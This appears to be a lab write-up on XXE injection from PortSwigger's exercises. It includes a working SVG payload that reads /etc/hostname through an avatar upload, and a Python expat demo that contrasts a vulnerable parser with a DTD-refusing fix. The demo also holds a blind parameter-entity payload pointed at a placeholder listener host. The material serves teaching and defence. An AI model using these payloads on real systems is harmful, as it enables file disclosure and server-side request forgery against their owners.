XML external entity (XXE) injection
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data.

(1) Lab: Exploiting XXE using external entities to retrieve files (Apprentice)

(2) Lab: Exploiting XXE to perform SSRF attacks (Apprentice)

(3) Lab: Exploiting XInclude to retrieve files (Practitioner)

(4) Lab: Exploiting XXE via image file upload (Practitioner)
Upload the following SVG as the comment avatar; the rendered image displays the entity's content, i.e. /etc/hostname:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
Hostname read from the rendered avatar: f7dbe7963014
(5) Lab: Blind XXE with out-of-band interaction (Practitioner)
(6) Lab: Blind XXE with out-of-band interaction via XML parameter entities (Practitioner)

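The following is an added example, not code from the labs or from PortSwigger. It reproduces, with Python's standard-library expat binding, what a parser does with the payloads from labs 1, 4, 5 and 6 above, and contrasts it with the fix (refusing any DOCTYPE rather than only disabling entities). The temporary file, its contents (the hostname from the note above), and the http://oast.example/ listener are constructed placeholders; no network is used, so a non-file SYSTEM identifier is only recorded, which is exactly where a real resolver would issue the SSRF (lab 2) or out-of-band (labs 5, 6) request. XInclude (lab 3) is not covered.

```python
"""Added example (not the labs' code): what a parser does with these payloads.

Uses Python's stdlib expat binding so the external-entity resolver is explicit
and switchable. The file path, its contents and the listener URL are made up.
"""
import os
import tempfile
from urllib.parse import urlparse
from xml.parsers import expat

FAKE_HOSTNAME = "f7dbe7963014"      # constructed stand-in for /etc/hostname
OAST_URL = "http://oast.example/"   # placeholder for a Collaborator-style listener


class DoctypeRejected(ValueError):
    """Raised by the hardened configuration whenever a DOCTYPE is present."""


def file_read_payload(target):
    """Labs 1 and 4: external entity declared in the DTD and referenced in a
    text node the application reflects (the SVG from the upload lab)."""
    return (
        '<?xml version="1.0" standalone="yes"?>\n'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{target}" > ]>\n'
        '<svg xmlns="http://www.w3.org/2000/svg" width="128px" height="128px">'
        '<text font-size="16" x="0" y="16">&xxe;</text></svg>'
    ).encode()


def blind_payload(listener):
    """Labs 5 and 6: a parameter entity (%xxe;) is fetched while the DTD itself
    is processed. Nothing is reflected; the only signal is the outbound request."""
    return (
        f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{listener}"> %xxe; ]>\n'
        '<stockCheck><productId>1</productId></stockCheck>'
    ).encode()


def parse(xml_bytes, *, resolve_external, allow_doctype):
    """Return (character data, SYSTEM ids the resolver acted on).

    resolve_external=True, allow_doctype=True  -> the vulnerable parser.
    allow_doctype=False                        -> the fix: refuse DTDs outright,
    so neither general nor parameter entities can be declared at all.
    """
    text, requested = [], []
    parser = expat.ParserCreate()
    # Process %xxe; in the internal subset, as parsers that load parameter
    # entities by default do; without this the blind payload is inert.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
    parser.CharacterDataHandler = text.append

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_doctype:
            raise DoctypeRejected(f"DOCTYPE {name!r} refused")

    def on_external_entity(context, base, system_id, public_id):
        # Fires for &xxe; (context is a str) and for %xxe; (context is None).
        if not resolve_external:
            return 1  # leave the reference unexpanded
        requested.append(system_id)
        url = urlparse(system_id)
        if url.scheme == "file":
            # Local read: the file-disclosure case. The entity's content is
            # parsed by a child parser and lands in the same text buffer.
            with open(url.path, "rb") as fh:
                body = fh.read()
            child = parser.ExternalEntityParserCreate(context)
            child.CharacterDataHandler = text.append
            child.Parse(body, True)
        # Other schemes (http, ftp, ...) would be fetched by a real resolver:
        # that is the SSRF / out-of-band case. No network is used here.
        return 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_bytes, True)
    return "".join(text), requested


def demo():
    """Both payloads through the vulnerable and the hardened configuration."""
    with tempfile.NamedTemporaryFile("w", delete=False) as fh:
        fh.write(FAKE_HOSTNAME)
        path = fh.name
    try:
        leaked, _ = parse(file_read_payload(f"file://{path}"),
                          resolve_external=True, allow_doctype=True)
        body, hits = parse(blind_payload(OAST_URL),
                           resolve_external=True, allow_doctype=True)
        try:
            parse(file_read_payload(f"file://{path}"),
                  resolve_external=False, allow_doctype=False)
            blocked = False
        except DoctypeRejected:
            blocked = True
        return {"leaked": leaked, "blind_body": body,
                "blind_requests": hits, "hardened_blocked": blocked}
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

Two things worth noticing when running it: in the blind case the response body is the normal "1", so the only evidence is the recorded request to the listener, which is why labs 5 and 6 need Burp Collaborator; and a configuration that merely leaves external entities unresolved (resolve_external=False, allow_doctype=True) still accepts the DOCTYPE, which is why the hardened mode refuses DTDs altogether.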